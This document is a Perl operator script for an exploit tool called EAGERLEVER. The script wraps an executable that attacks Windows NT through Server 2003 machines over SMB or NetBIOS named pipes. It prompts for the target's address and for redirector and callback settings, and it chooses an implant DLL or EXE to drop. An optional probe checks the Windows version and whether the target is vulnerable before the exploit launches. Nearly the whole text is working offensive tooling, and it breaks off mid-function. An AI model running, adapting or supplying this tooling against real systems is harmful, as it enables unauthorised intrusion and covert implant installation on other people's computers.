exploit

1. use strict;
2. use vars qw($VERSION);
3.  
4. $::VERSION = "EAGERLEVER Script: 2.1.3";
5. print "\n\n$::VERSION\n\n";
6.  
7.  
8.  
9. use FindBin;
10. use lib "$FindBin::Bin";
11. use Getopt::Long;
12. use Cwd;
13.  
14. use lib "$FindBin::Bin\\..\\..\\Resources\\Perl";
15. use ExploitUtils qw(
16. $EU_LOGFILE
17. $EU_VERBOSE
18. $EU_BATCHMODE
19. EU_LogInit
20. EU_Log
21. EU_ExitMessage
22. EU_GetInput
23. EU_GetExistingDir
24. EU_GetIP
25. EU_GetLocalIP
26. EU_GetRootDir
27. EU_GetPort
28. EU_RunCommand
29. EU_GetAddr
30. );
31.  
32.  
33. use vars qw($RIDEAREA $PAYLOAD_DLL $PAYLOAD_EXE $EXPLOIT_EXE @DEPFILES);
34.  
35. my %opts = ();
36. GetOptions(\%opts, "v", "h", "q|?", "b", "e=s", "f=s", "d=s", "t=s", "l=s", "c=s", "x=s", "n=s") or &print_script_usage(0);
37.  
38. if (scalar(@ARGV) > 0 ) {
39. &EU_Log(1, "Extraneous arguments found on command line: @ARGV");
40. &EU_Log(1, "Arguments will be ingnored");
41. while(@ARGV) {shift;}
42. }
43.  
44. if (!defined($opts{"e"})) {
45. &EU_Log(1, "A -e option must be supplied.");
46. &print_usage(0);
47. }
48.  
49. if (!defined($opts{"f"})) {
50. &EU_Log(1, "A -f option must be supplied.");
51. &print_usage(0);
52. }
53.  
54. if (!defined($opts{"x"})) {
55. &EU_Log(1, "A -x option must be supplied.");
56. &print_usage(0);
57. }
58.  
59. if (!defined($opts{"l"})) {
60. &EU_Log(1, "A -l option must be supplied.");
61. &print_usage(0);
62. }
63.  
64. if (!defined($opts{"n"})) {
65. &EU_Log(1, "A -n option must be supplied.");
66. &print_usage(0);
67. }
68.  
69. $::RIDEAREA = "Resources\\Tools\\ridearea2.exe";
70.  
71. $::LP_DLL = "$opts{l}";
72. $::PAYLOAD_DLL = "$opts{f}";
73. $::PAYLOAD_EXE = "$opts{x}";
74. $::PAYLOAD_EXE_NAME = "$opts{n}";
75. $::EXPLOIT_EXE = "$opts{e}\\ELV.exe";
76.  
77. $::EGG_SOCKET_NONE = "1";
78. $::EGG_SOCKET_NEW = "2";
79. $::EGG_SOCKET_REUSE = "3";
80.  
81. $::IMPLANT_SOCKET_NEW = "2";
82. $::IMPLANT_SOCKET_MAINTAIN = "3";
83.  
84. $::RUN_EXPLOIT = "1";
85. $::RUN_PROBE_1 = "2";
86.  
87.  
88. my $work_dir = $opts{"d"} if (defined $opts{"d"});
89. my $root_dir = $opts{"c"} if (defined $opts{"c"});
90. my $TargetIpIn = $opts{"t"} if (defined $opts{"t"});
91.  
92.  
93. @DEPFILES = ($::RIDEAREA, $::EXPLOIT_EXE);
94.  
95.  
96. my $logfile_prefix = "ELV_";
97. my $logfile_suffix = "_script.log";
98. my $filename_suffix = "_payload.bin";
99.  
100. my $TargetIp = $TargetIpIn;
101. my $TargetPort = 0;
102. my $ImplantSocketStatus= $::IMPLANT_SOCKET_NEW;
103. my $TimeOutValue = 0;
104.  
105. my $PayloadFile = "";
106. my $PayloadType = "";
107. my $PayloadDropName = "N/A";
108.  
109. my $EggSocketStatus = $::EGG_SOCKET_REUSE;
110. my $EggCallbackIp = "127.0.0.1";
111. my $EggCallbackPort = 0;
112.  
113. my $ExternalRideArea = 0;
114. my $RA_Payload = "N/A";
115.  
116. my $TransProt_none =0;
117. my $TransProt_tcp =1;
118. my $TransProt_udp =2;
119. my $TargetTransportProtocol = $TransProt_none;
120. my $TransportProtocol = "undefined";
121.  
122. my $AppProt_none = 0;
123. my $AppProt_NA = 1;
124. my $AppProt_nbt = 2;
125. my $AppProt_smb = 3;
126. my $AppProt_smtp = 4;
127. my $AppProt_pop = 5;
128. my $AppProt_http = 6;
129. my $AppProt_ftp = 7;
130. my $AppProt_telnet = 8;
131. my $AppProt_imap = 9;
132. my $TargetApplicationProtocol = $AppProt_none;
133. my $ApplicationProtocol = "undefined";
134.  
135. my $RpcConnection = "";
136.  
137.  
138. my $RPCTOUCHII_RUN_GENERAL_PROBE = 1;
139. my $RPCTOUCHII_RUN_REGPROBE = 2;
140. my $RPCTOUCHII_RUN_XP_SP0_PROBE = 3;
141. my $RPCTOUCHII_RUN_RPC_INTERFACE_PORT = 4;
142. my $RPCTOUCHII_RUN_WINDOWS_2000_SP4_PROBE = 5;
143. my $RPCTOUCHII_RUN_KB823980_PROBE = 6;
144. my $RPCTOUCHII_RUN_KB824146_PROBE = 7;
145. my $RPCTOUCHII_RUN_WINDOWS_2003_PROBE = 8;
146.  
147.  
148.  
149. my $not = "NOT GOOD";
150. my $w9x = "Windows 9x";
151. my $nt4 = "Windows NT 4.0";
152. my $w2k = "Windows 2000";
153. my $w2ksp0123 = "Windows 2000 Service Pack 0, 1, 2, or 3";
154. my $w2ksp4 = "Windows 2000 Service Pack 4";
155. my $wxp = "Windows XP";
156. my $wxpsp0 = "Windows XP Service Pack 0";
157. my $wxpsp1 = "Windows XP Service Pack 1";
158. my $wxpsp2 = "Windows XP Service Pack 2";
159. my $w2kXp = "Windows 2000 XP" ;
160. my $wxp2003 = "Windows XP Server 2003" ;
161. my $ws2003 = "Windows Server 2003";
162. my $ws2003sp1 = "Windows Server 2003 Service Pack 1";
163.  
164.  
165.  
166.  
167. my $WindowsVersion = 0;
168. my $TargetServerIp = "$TargetIpIn";
169.  
170.  
171. &print_usage(1) if (defined $opts{"h"});
172. &print_usage(0) if (defined $opts{"q"});
173.  
174. $ExploitUtils::EU_VERBOSE = 1 if (defined $opts{"v"});
175. $ExploitUtils::EU_BATCHMODE = 1 if (defined $opts{"b"});
176.  
177.  
178.  
179. if ($ENV{"OS"} ne "Windows_NT") {
180. &EU_ExitMessage(1,"This script requires Windows NT or Windows 2000");
181. }
182.  
183.  
184. $work_dir = &EU_GetExistingDir("Enter pathname for operation's working directory", $work_dir, 1);
185. $root_dir = &EU_GetRootDir($root_dir,@::DEPFILES);
186.  
187.  
188.  
189. &EU_LogInit($logfile_prefix, $logfile_suffix, $work_dir);
190. &EU_Log(0,"$::VERSION");
191.  
192.  
193.  
194. &EU_Log(0,"\nChanging to working directory: $work_dir");
195. chdir $work_dir || &EU_ExitMessage(1,"Unable to change to working directory: $work_dir");
196.  
197.  
198.  
199. ($TargetIp, $TargetPort, $EggSocketStatus, $ImplantSocketStatus, $PayloadFile, $PayloadType, $PayloadDropName, $TimeOutValue,
200. $TargetTransportProtocol, $TargetApplicationProtocol, $RpcConnection,
201. $EggCallbackIp, $EggCallbackPort, $ExternalRideArea,
202. $WindowsVersion, $TargetServerIp) =
203. &validate_parms($work_dir, $root_dir, $TargetIp, $TargetPort, $EggSocketStatus, $ImplantSocketStatus, $PayloadFile, $PayloadType, $PayloadDropName,
204. $TimeOutValue, $TargetTransportProtocol, $TargetApplicationProtocol, $RpcConnection,
205. $EggCallbackIp, $EggCallbackPort, $ExternalRideArea,
206. $WindowsVersion, $TargetServerIp);
207.  
208. my $answer;
209. if(!$EU_BATCHMODE) {
210. $answer = &EU_GetInput("\nReady to begin exploit ([y],n,quit)? ", "y");
211. &EU_ExitMessage(0,"User terminated script") if ($answer ne "y" and $answer ne "Y");
212. }
213.  
214.  
215. if ($ExternalRideArea == 1) {
216.  
217.  
218. my $payload_name_format = "${work_dir}\\${logfile_prefix}%04d%02d%02d_%02d%02d%02d${filename_suffix}";
219. my ($sec, $min, $hour, $mday, $mon, $year, $wday, $yday, $isdst) = gmtime(time);
220.  
221. $year += 1900;
222. $mon += 1;
223.  
224. $RA_Payload = sprintf($payload_name_format,$year,$mon,$mday,$hour,$min,$sec);
225.  
226.  
227. if( $ImplantSocketStatus eq $::IMPLANT_SOCKET_MAINTAIN ) {
228. if ($PayloadDropName eq "N/A") {
229. if ($PayloadType eq "d") {
230. &EU_RunCommand("\"$root_dir\\$::RIDEAREA\" -i \"$PayloadFile\" -x $PayloadType -o \"$RA_Payload\" -f 17 -a 8 -t m -l m");
231. }
232. else {
233. &EU_RunCommand("\"$root_dir\\$::RIDEAREA\" -i \"$PayloadFile\" -x $PayloadType -o \"$RA_Payload\" -f 17 -a 8 -t m");
234. }
235. }
236. else {
237. if ($PayloadType eq "d") {
238. &EU_RunCommand("\"$root_dir\\$::RIDEAREA\" -i \"$PayloadFile\" -x $PayloadType -d $PayloadDropName -o \"$RA_Payload\" -f 17 -a 8 -t m -l m");
239. }
240. else {
241. &EU_RunCommand("\"$root_dir\\$::RIDEAREA\" -i \"$PayloadFile\" -x $PayloadType -d $PayloadDropName -o \"$RA_Payload\" -f 17 -a 8 -t m");
242. }
243. }
244. }
245. elsif( $ImplantSocketStatus eq $::IMPLANT_SOCKET_NEW ) {
246. if ($PayloadDropName eq "N/A") {
247. if ($PayloadType eq "d") {
248. &EU_RunCommand("\"$root_dir\\$::RIDEAREA\" -i \"$PayloadFile\" -x $PayloadType -o \"$RA_Payload\" -f 13 -a 3 -t m -l m");
249. }
250. else {
251. &EU_RunCommand("\"$root_dir\\$::RIDEAREA\" -i \"$PayloadFile\" -x $PayloadType -o \"$RA_Payload\" -f 13 -a 3 -t m");
252. }
253. }
254. else {
255. if ($PayloadType eq "d") {
256. &EU_RunCommand("\"$root_dir\\$::RIDEAREA\" -i \"$PayloadFile\" -x $PayloadType -d $PayloadDropName -o \"$RA_Payload\" -f 13 -a 3 -t m -l m");
257. }
258. else {
259. &EU_RunCommand("\"$root_dir\\$::RIDEAREA\" -i \"$PayloadFile\" -x $PayloadType -d $PayloadDropName -o \"$RA_Payload\" -f 13 -a 3 -t m");
260. }
261. }
262. }
263. }
264.  
265.  
266.  
267.  
268.  
269.  
270. my $flags;
271. if($ExploitUtils::EU_VERBOSE) { $flags = "-v"; }
272. else { $flags = ""; }
273.  
274. &EU_Log(1,"\nExploit will launch in a separate window. Follow the status messages");
275. &EU_Log(1,"in the new window to determine if it succeeds.");
276. &EU_Log(1,"\nLaunching exploit...");
277.  
278.  
279. my $ImplantPayload = "N/A";
280. if ($ExternalRideArea == 1) {
281. $ImplantPayload = $RA_Payload;
282. }
283. else {
284. $ImplantPayload = $PayloadFile;
285. }
286.  
287. if ($ExternalRideArea == 1) {
288. &EU_RunCommand("start \"ELV Exploit\" cmd /T:9F /K \"\"$root_dir\\$::EXPLOIT_EXE\" -r $::RUN_EXPLOIT -i $TargetIp -p $TargetPort -u $EggSocketStatus -c $ImplantSocketStatus -I $EggCallbackIp -P $EggCallbackPort -f \"$ImplantPayload\" -l \"$root_dir\\$::LP_DLL\" -z -o $TimeOutValue -t $TargetTransportProtocol -b $TargetApplicationProtocol $RpcConnection -w $WindowsVersion -h $TargetServerIp\"");
289. }
290. else {
291. if ($PayloadDropName eq "N/A") {
292. &EU_RunCommand("start \"ELV Exploit\" cmd /T:9F /K \"\"$root_dir\\$::EXPLOIT_EXE\" -r $::RUN_EXPLOIT -i $TargetIp -p $TargetPort -u $EggSocketStatus -c $ImplantSocketStatus -I $EggCallbackIp -P $EggCallbackPort -f \"$ImplantPayload\" -x $PayloadType -l \"$root_dir\\$::LP_DLL\" -o $TimeOutValue -t $TargetTransportProtocol -b $TargetApplicationProtocol $RpcConnection -w $WindowsVersion -h $TargetServerIp\"");
293. }
294. else {
295. &EU_RunCommand("start \"ELV Exploit\" cmd /T:9F /K \"\"$root_dir\\$::EXPLOIT_EXE\" -r $::RUN_EXPLOIT -i $TargetIp -p $TargetPort -u $EggSocketStatus -c $ImplantSocketStatus -I $EggCallbackIp -P $EggCallbackPort -f \"$ImplantPayload\" -x $PayloadType -q $PayloadDropName -l \"$root_dir\\$::LP_DLL\" -o $TimeOutValue -t $TargetTransportProtocol -b $TargetApplicationProtocol $RpcConnection -w $WindowsVersion -h $TargetServerIp\"");
296. }
297. }
298.  
299.  
300.  
301. my $cur_dir = cwd();
302. chdir $cur_dir || &EU_ExitMessage(1,"Unable to switch back to initial directory: $cur_dir");
303.  
304. &EU_ExitMessage(0,"\nDone with $::0.");
305.  
306.  
307.  
308. sub print_usage() {
309. my ($verbose) = @_;
310. print "$::VERSION\n";
311.  
312. print qq~
313. Usage: $::0 [-v] [-h] [-?] [-b]
314. [-d <working directory>] [-e <exploits directory>]
315. [-t <target IP>] [-l <lp dll>]
316. [-f <payload dll>]
317. [-x <payload exe> [-n <Payload Dropname>]]
318.  
319. ~;
320.  
321. if ($verbose) {
322. print qq~
323.  
324. -v verbose mode. Default non-verbose mode.
325.  
326. -h Print this help information.
327.  
328. -? Print abbreviated help information.
329.  
330. -b Batch (non-interactive) mode. Default interactive mode.
331.  
332. -d <working directory> Working Directory
333. Top-level directory where operation's files will be
334. generated. Default E:\.
335.  
336. -e <exploits directory> Exploits Directory
337. Top-level directory containing exploit files.
338. Default one directory up from directory containing this script.
339.  
340. -t <target IP> Target IP address.
341. Default derived as last part of working directory name.
342.  
343. -l <lp dll> Filename of the listening post dll.
344.  
345. -f <payload dll> Filename of the implant payload (dll).
346.  
347. -x <payload exe> Filename of the implant payload (exe).
348.  
349. -n <payload dropname> Filename to be used for the dropped executable
350.  
351. ~;
352. }
353.  
354. &EU_ExitMessage(1,"End of help.");
355. }
356.  
357.  
358. sub validate_parms() {
359. my ($work_dir, $root_dir, $TargetIp, $TargetPort, $EggSocketStatus, $ImplantSocketStatus, $PayloadFile, $PayloadType, $PayloadDropName,
360. $TimeOutValue,$TargetTransportProtocol, $TargetApplicationProtocol, $RpcConnection,
361. $EggCallbackIp, $EggCallbackPort, $ExternalRideArea,
362. $WindowsVersion, $TargetServerIp) = @_;
363.  
364. my ($continue, $retcode, $vol, $dir);
365. my ($redirectFlag);
366. my $OrgTargetIp = $TargetIp;
367. my $LPRedirectionIp = "127.0.0.1";
368. my $LPRedirectionPort = "undefined";
369. my $DestinationIp = $TargetIp;
370. my $DestinationPort = "undefined";
371. my $TransportProtocolSelected = 0;
372. my $RideAreaOpt = "Exploit called";
373.  
374. my ($LocalIp);
375.  
376.  
377. my $RpcTouchProtocol = "undefined";
378.  
379.  
380.  
381.  
382.  
383. $LocalIp = &EU_GetLocalIP("Enter the local IP Address", $LocalIp);
384. &EU_Log(0, "Enter the local IP Address: $LocalIp");
385. while (1) {
386.  
387.  
388.  
389. &EU_Log(1,"\nSelect Payload file to send:\n");
390. &EU_Log(1," 0) $::PAYLOAD_DLL");
391. &EU_Log(1," 1) $::PAYLOAD_EXE ($::PAYLOAD_EXE_NAME)");
392. while(1) {
393. $retcode = &EU_GetInput("\nEnter selection [0]: ", "0");
394. &EU_Log(0, "\nEnter selection [0]: $retcode");
395.  
396. if($retcode eq "0") {
397. &EU_Log(1,"\nUsing Payload file $::PAYLOAD_DLL\n");
398. $PayloadFile = $::PAYLOAD_DLL;
399. $PayloadType = "d";
400. $PayloadDropName = "N/A";
401. }
402. elsif($retcode eq "1") {
403. &EU_Log(1,"\nUsing Payload file $::PAYLOAD_EXE\n");
404. $PayloadFile = $::PAYLOAD_EXE;
405. $PayloadType = "e";
406. $PayloadDropName = $::PAYLOAD_EXE_NAME;
407. }
408. else {
409. &EU_Log(1, "Invalid option. Try again or enter 'quit'.");
410. next;
411. }
412. last;
413. }
414.  
415.  
416.  
417. &EU_Log(1,"\nRideArea option:\n");
418. &EU_Log(1," 0) Have exploit call RideArea [DEFAULT]");
419. &EU_Log(1," 1) Have the script call RideArea. (RideArea is newer than the exploit)");
420. while(1) {
421. $ExternalRideArea = &EU_GetInput("\nEnter selection [0]: ", $ExternalRideArea);
422. &EU_Log(0, "\nEnter selection [0]: $ExternalRideArea");
423.  
424. if($ExternalRideArea eq "0") {
425. $RideAreaOpt = "Exploit called";
426. }
427. elsif($ExternalRideArea eq "1") {
428. $RideAreaOpt = "Script called";
429. }
430. else {
431. &EU_Log(1, "Invalid option. Try again or enter 'quit'.");
432. next;
433. }
434. last;
435. }
436.  
437.  
438. &EU_Log(1,"\nSelect the Transport Protocol Sequence To Use:\n");
439. &EU_Log(1," 1) NBT/Named Pipe (TCP Port 139 is accessible)");
440. &EU_Log(1," 2) SMB/Named Pipe (TCP Port 445 is accessible)");
441. while(1) {
442. $TransportProtocolSelected = &EU_GetInput("\nEnter selection [2]: ", "2");
443. &EU_Log(0, "\nEnter selection [2]: $TransportProtocolSelected");
444. if ($TransportProtocolSelected eq "1") {
445. $TargetTransportProtocol = $TransProt_tcp;
446. $TransportProtocol = "tcp";
447. $TargetApplicationProtocol = $AppProt_nbt;
448. $ApplicationProtocol = "nbt";
449. $RpcConnection = "-rpc";
450. $RpcTouchProtocol = "rpc_nbt";
451. $DestinationPort = 139;
452. }
453. elsif($TransportProtocolSelected eq "2") {
454. $TargetTransportProtocol = $TransProt_tcp;
455. $TransportProtocol = "tcp";
456. $TargetApplicationProtocol = $AppProt_smb;
457. $ApplicationProtocol = "smb";
458. $RpcConnection = "-rpc";
459. $RpcTouchProtocol = "rpc_smb";
460. $DestinationPort = 445;
461. }
462. elsif($TransportProtocolSelected eq "3") {
463. $TargetTransportProtocol = $TransProt_udp;
464. $TransportProtocol = "udp";
465. $TargetApplicationProtocol = $AppProt_NA;
466. $ApplicationProtocol = "NA";
467. $RpcConnection = "-rpc";
468. $RpcTouchProtocol = "rpc_udp";
469. $DestinationPort = 135;
470. }
471. else {
472. &EU_Log(1, "Invalid option. Try again or enter 'quit'.");
473. next;
474. }
475. last;
476. }
477.  
478.  
479. $retcode = &EU_GetInput("\nWill this operation be REDIRECTED ([y],n)? ", "y");
480.  
481. if( ($retcode eq "y") or ($retcode eq "yes") or ($retcode eq "Y") or ($retcode eq "YES") ) { $redirectFlag = 1; }
482. else { $redirectFlag = 0; }
483.  
484.  
485.  
486. if( $redirectFlag == 0 ) {
487.  
488.  
489. $EggCallbackIp = $LocalIp;
490. $TargetIp = $OrgTargetIp;
491. $TargetIp = &EU_GetIP("\nEnter the target IP Address", $TargetIp);
492. &EU_Log(0, "Enter the target IP Address: $TargetIp");
493. $DestinationIp = $TargetIp;
494.  
495. $DestinationPort = &EU_GetPort("\nEnter the target Port", $DestinationPort);
496. &EU_Log(0, "Enter the target Port: $DestinationPort");
497.  
498. $TargetPort = $DestinationPort;
499. $TargetServerIp = $TargetIp;
500.  
501.  
502. ($ImplantSocketStatus, $EggSocketStatus) = &get_socket_options($ImplantSocketStatus, $EggSocketStatus, $PayloadType);
503.  
504. if( $EggSocketStatus eq $::EGG_SOCKET_NEW) {
505.  
506. &EU_Log(1, "\nThe ELV Exploit Payload must callback in order to upload the Implant Payload.");
507.  
508. &EU_Log(1, "The local IP Address should be used as the Egg callback IP Address.");
509.  
510. $EggCallbackIp = &EU_GetLocalIP("\nEnter the Egg callback IP Address", $LocalIp);
511. &EU_Log(0, "Enter the Egg callback IP Address: $EggCallbackIp");
512.  
513. $EggCallbackPort = $DestinationPort * 10 + 1;
514. while(1) {
515. $EggCallbackPort = &EU_GetPort("\nEnter the Egg callback Port", $EggCallbackPort);
516. &EU_Log(0, "Enter the Egg callback Port: $EggCallbackPort");
517. if($EggCallbackPort eq "0") {
518. &EU_Log(1, "Invalid Port number. Try again or enter 'quit'.");
519. next;
520. }
521. last;
522. }
523. }
524.  
525. }
526.  
527. else {
528.  
529.  
530.  
531. $LPRedirectionIp = &EU_GetIP("\nEnter the LP Redirection IP address", $LPRedirectionIp);
532. &EU_Log(0, "Enter the LP Redirection IP address: $LPRedirectionIp");
533. $TargetIp = $LPRedirectionIp;
534.  
535. $LPRedirectionPort = $DestinationPort * 10;
536. if($RpcTouchProtocol eq "rpc_nbt") {
537. &EU_Log(1, "\nELV must be directed to the Target on TCP Port 139.");
538. $LPRedirectionPort = &EU_GetPort("Enter the LP Redirection Port No.", $LPRedirectionPort);
539. &EU_Log(0,"Enter the LP Redirection Port No.: $LPRedirectionPort");
540.  
541. $TargetServerIp = &EU_GetIP("\nEnter the NBT Server's IP address (AKA: the Actual Target's IP Address)", $DestinationIp);
542. &EU_Log(0,"Enter the NBT Server's IP address: $TargetServerIp");
543. }
544. elsif($RpcTouchProtocol eq "rpc_smb") {
545. &EU_Log(1, "\nELV must be directed to the Target on TCP Port 445.");
546. $LPRedirectionPort = &EU_GetPort("Enter the LP Redirection Port No.", $LPRedirectionPort);
547. &EU_Log(0,"Enter the LP Redirection Port No.: $LPRedirectionPort");
548.  
549. $TargetServerIp = &EU_GetIP("\nEnter the SMB Server's IP address (AKA: the Actual Target's IP Address)", $DestinationIp);
550. &EU_Log(0,"Enter the SMB Server's IP address: $TargetServerIp");
551. }
552. $TargetPort = $LPRedirectionPort;
553.  
554.  
555. ($ImplantSocketStatus, $EggSocketStatus) = &get_socket_options($ImplantSocketStatus, $EggSocketStatus, $PayloadType);
556.  
557. if( $EggSocketStatus eq $::EGG_SOCKET_NEW) {
558.  
559.  
560. &EU_Log(1, "\n");
561. &EU_Log(1, "*************************************************************************");
562. &EU_Log(1, "* The ELV Exploit Payload must callback in order to upload the Implant *");
563. &EU_Log(1, "* Payload. The callback IP Address MUST be that of the Middle *");
564. &EU_Log(1, "* Redirector. The callback Port MUST be the same number on both the *");
565. &EU_Log(1, "* Middle Redirector and the local machine, else redirection will fail. *");
566. &EU_Log(1, "* The local machine uses this port to listen for the callback, and the *");
567. &EU_Log(1, "* ELV Exploit Payload uses it to call back to the local machine *");
568. &EU_Log(1, "* through the Redirector. *");
569. &EU_Log(1, "*************************************************************************");
570.  
571. $EggCallbackIp = &EU_GetLocalIP("\nEnter the Egg callback(Middle Redirector) IP ", $EggCallbackIp);
572. &EU_Log(0, "Enter the Egg callback(Middle Redirector) IP Address: $EggCallbackIp");
573.  
574. $EggCallbackPort = $DestinationPort * 10 + 1;
575. while(1) {
576. $EggCallbackPort = &EU_GetPort("\nEnter the Egg callback Port", $EggCallbackPort);
577. &EU_Log(0, "Enter the Egg callback Port: $EggCallbackPort");
578. if($EggCallbackPort eq "0") {
579. &EU_Log(1, "Invalid Port number. Try again or enter 'quit'.");
580. next;
581. }
582. last;
583. }
584. }
585. }
586.  
587.  
588. &EU_Log(1, "\nThe default time-out value for the target connection is 60 sec.");
589. &EU_Log(1, "(You may want to increase this value if the network is exceptionally slow.)");
590. $retcode = &EU_GetInput("Use default value of 60 sec ([y],n)? ", "y");
591. &EU_Log(0, "Use default value of 60 sec ([y],n)? $retcode");
592.  
593. if( ($retcode eq "y") or ($retcode eq "yes") or ($retcode eq "Y") or ($retcode eq "YES") or ($retcode eq "60") ) {
594. $TimeOutValue = "60";
595. }
596. else {
597. $TimeOutValue = &EU_GetInput("Enter new time-out value (greater than 60): ");
598. &EU_Log(0, "Enter new time-out value (greater than 60): $TimeOutValue");
599. }
600.  
601.  
602.  
603. &EU_Log(1,"\nConfirm Network Parameters:");
604. &EU_Log(1,"\tRoot Directory : $root_dir");
605. &EU_Log(1,"\tLocal IP : $LocalIp");
606. &EU_Log(1,"\tPayload file : $PayloadFile");
607. &EU_Log(1,"\tPayload drop name : $PayloadDropName");
608. &EU_Log(1,"\tRideArea Option : $RideAreaOpt");
609. if( $redirectFlag ) {
610. &EU_Log(1,"\tUsing Redirection : True");
611. &EU_Log(1,"\tLP Redirector IP : $LPRedirectionIp");
612. &EU_Log(1,"\tLP Redirector Port : $LPRedirectionPort");
613. }
614. else {
615. &EU_Log(1,"\tUsing Redirection : False");
616. }
617. &EU_Log(1,"\tTarget IP : $DestinationIp");
618. &EU_Log(1,"\tTarget Port : $DestinationPort");
619.  
620. if( $EggSocketStatus eq $::EGG_SOCKET_NEW ) {
621. &EU_Log(1,"\tEgg Socket Status : New");
622. if( $redirectFlag ) {
623. &EU_Log(1,"\tEgg Callback IP : $EggCallbackIp (Middle Redirector)");
624. }
625. else {
626. &EU_Log(1,"\tEgg Callback IP : $EggCallbackIp");
627. }
628. &EU_Log(1,"\tEgg Callback Port : $EggCallbackPort");
629. }
630. elsif( $EggSocketStatus eq $::EGG_SOCKET_REUSE ) {
631. &EU_Log(1,"\tEgg Socket Status : Reuse");
632. }
633. else {
634. &EU_Log(1,"\tEgg Socket Status : None");
635. }
636.  
637. if( $ImplantSocketStatus eq $::IMPLANT_SOCKET_MAINTAIN ) {
638. &EU_Log(1,"\tExploit Socket Status : Maintain (Use existing connection for the entire operation.)");
639. }
640. else {
641. &EU_Log(1,"\tExploit Socket Status : Close (Existing connection will NOT be used for the entire operation.)");
642. }
643.  
644.  
645. &EU_Log(1,"\tTransport Protocol : $TransportProtocol");
646. &EU_Log(1,"\tApplication Protocol : $ApplicationProtocol");
647. &EU_Log(1,"\tRpc Connection flag : $RpcConnection");
648.  
649. &EU_Log(1,"\tNetwork Time Out : $TimeOutValue sec");
650.  
651.  
652. $continue = &EU_GetInput("\nContinue with the current values ([y],n,quit)? ","y");
653. &EU_Log(0, "\nContinue with the current values ([y],n,quit)? $continue");
654.  
655. if( ($continue eq "y") or ($continue eq "yes") or ($continue eq "Y") or ($continue eq "YES") ) {
656. ;
657. }
658. elsif( ($continue eq "q") or ($continue eq "quit") or ($continue eq "Q") or ($continue eq "QUIT") ) {
659. &EU_ExitMessage(1,"User terminated script\n");
660. }
661. else {
662. &EU_Log(1, "Returning to top of script...\n");
663. next;
664. }
665.  
666.  
667. my $touchFlag = "n";
668. $WindowsVersion = $not;
669.  
670. $touchFlag = &EU_GetInput("\nUse ELV touch option to obtain the Windows Version ([y],n)? ", "y");
671.  
672. if(($touchFlag eq "y") or ($touchFlag eq "Y") or ($touchFlag eq "yes") or ($touchFlag eq "YES")) {
673. my $bVulnerable = 0;
674. my $bError = 0;
675.  
676.  
677.  
678. ($WindowsVersion, $bVulnerable, $bError) = &run_elvtouch($root_dir,$TargetIp,$TargetPort,$TargetTransportProtocol, $TargetApplicationProtocol, $RpcConnection, $TargetServerIp, $TimeOutValue,$::RUN_PROBE_1);
679.  
680.  
681. if( ($WindowsVersion eq $not) or ($bVulnerable == 0) or ($bError == 1) ) {
682.  
683.  
684. &EU_Log(1, "\n*** WARNING *** Recommend you STOP and re-evaluate before proceeding!");
685. $continue = &EU_GetInput("\nDo you wish to continue (y,n,[quit])? ", "quit");
686. &EU_Log(0, "\nDo you wish to continue (y,n,[quit])? $continue");
687.  
688. if( ($continue eq "q") or ($continue eq "Q") or ($continue eq "quit") or ($continue eq "QUIT") ) {
689. &EU_ExitMessage(1,"User terminated script\n");
690. }
691. elsif( ($continue eq "n") or ($continue eq "N") or ($continue eq "no") or ($continue eq "NO") ) {
692. &EU_Log(1, "Returning to top of script...\n");
693. next;
694. }
695. else {
696. $touchFlag = "n";
697. }
698. }
699. else {
700.  
701.  
702. $retcode = &EU_GetInput("\nUse \"$WindowsVersion\" as the target Windows Version ([y],n)? ", "y");
703. if( ($retcode eq "n") or ($retcode eq "N") or ($retcode eq "no") or ($retcode eq "NO") ) {
704. $retcode = &EU_GetInput("\n*CAUTION* Are you CERTAIN that you wish to defy the probe results (y,[n])? ", "n");
705.  
706. if( ($retcode eq "n") or ($retcode eq "N") or ($retcode eq "no") or ($retcode eq "NO") ) {
707. &EU_Log(1,"Good. Using probe results for the target machine type.\n");
708. }
709. else {
710. $touchFlag = "n";
711. }
712. }
713. }
714.  
715. }
716.  
717. if(($EggSocketStatus eq $::EGG_SOCKET_REUSE) and ($WindowsVersion eq $nt4)) {
718. &EU_Log(1, "\nERROR: Egg socket option REUSE is not supported on $nt4.");
719. &EU_Log(1, "Please select the option to create a NEW socket.");
720. next;
721. }
722.  
723.  
724.  
725. &EU_Log(1,"\nConfirm Network Parameters:");
726. &EU_Log(1,"\tRoot Directory : $root_dir");
727. &EU_Log(1,"\tLocal IP : $LocalIp");
728. &EU_Log(1,"\tPayload file : $PayloadFile");
729. &EU_Log(1,"\tPayload drop name : $PayloadDropName");
730. &EU_Log(1,"\tRideArea Option : $RideAreaOpt");
731. if( $redirectFlag ) {
732. &EU_Log(1,"\tUsing Redirection : True");
733. &EU_Log(1,"\tLP Redirector IP : $LPRedirectionIp");
734. &EU_Log(1,"\tLP Redirector Port : $LPRedirectionPort");
735. }
736. else {
737. &EU_Log(1,"\tUsing Redirection : False");
738. }
739. &EU_Log(1,"\tTarget IP : $DestinationIp");
740. &EU_Log(1,"\tTarget Port : $DestinationPort");
741.  
742. if( $EggSocketStatus eq $::EGG_SOCKET_NEW ) {
743. &EU_Log(1,"\tEgg Socket Status : New");
744. if( $redirectFlag ) {
745. &EU_Log(1,"\tEgg Callback IP : $EggCallbackIp (Middle Redirector)");
746. }
747. else {
748. &EU_Log(1,"\tEgg Callback IP : $EggCallbackIp");
749. }
750. &EU_Log(1,"\tEgg Callback Port : $EggCallbackPort");
751. }
752. elsif( $EggSocketStatus eq $::EGG_SOCKET_REUSE ) {
753. &EU_Log(1,"\tEgg Socket Status : Reuse");
754. }
755. else {
756. &EU_Log(1,"\tEgg Socket Status : None");
757. }
758.  
759. if( $ImplantSocketStatus eq $::IMPLANT_SOCKET_MAINTAIN ) {
760. &EU_Log(1,"\tExploit Socket Status : Maintain (Use existing connection for the entire operation.)");
761. }
762. else {
763. &EU_Log(1,"\tExploit Socket Status : Close (Existing connection will NOT be used for the entire operation.)");
764. }
765.  
766.  
767. &EU_Log(1,"\tTransport Protocol : $TransportProtocol");
768. &EU_Log(1,"\tApplication Protocol : $ApplicationProtocol");
769. &EU_Log(1,"\tRpc Connection flag : $RpcConnection");
770.  
771. &EU_Log(1,"\tNetwork Time Out : $TimeOutValue sec");
772. &EU_Log(1,"\tWindows Version : $WindowsVersion");
773.  
774.  
775. $continue = &EU_GetInput("\nContinue with the current values ([y],n,quit)? ","y");
776. &EU_Log(0, "\nContinue with the current values ([y],n,quit)? $continue");
777.  
778. if( ($continue eq "y") or ($continue eq "yes") or ($continue eq "Y") or ($continue eq "YES") ) {
779. last;
780. }
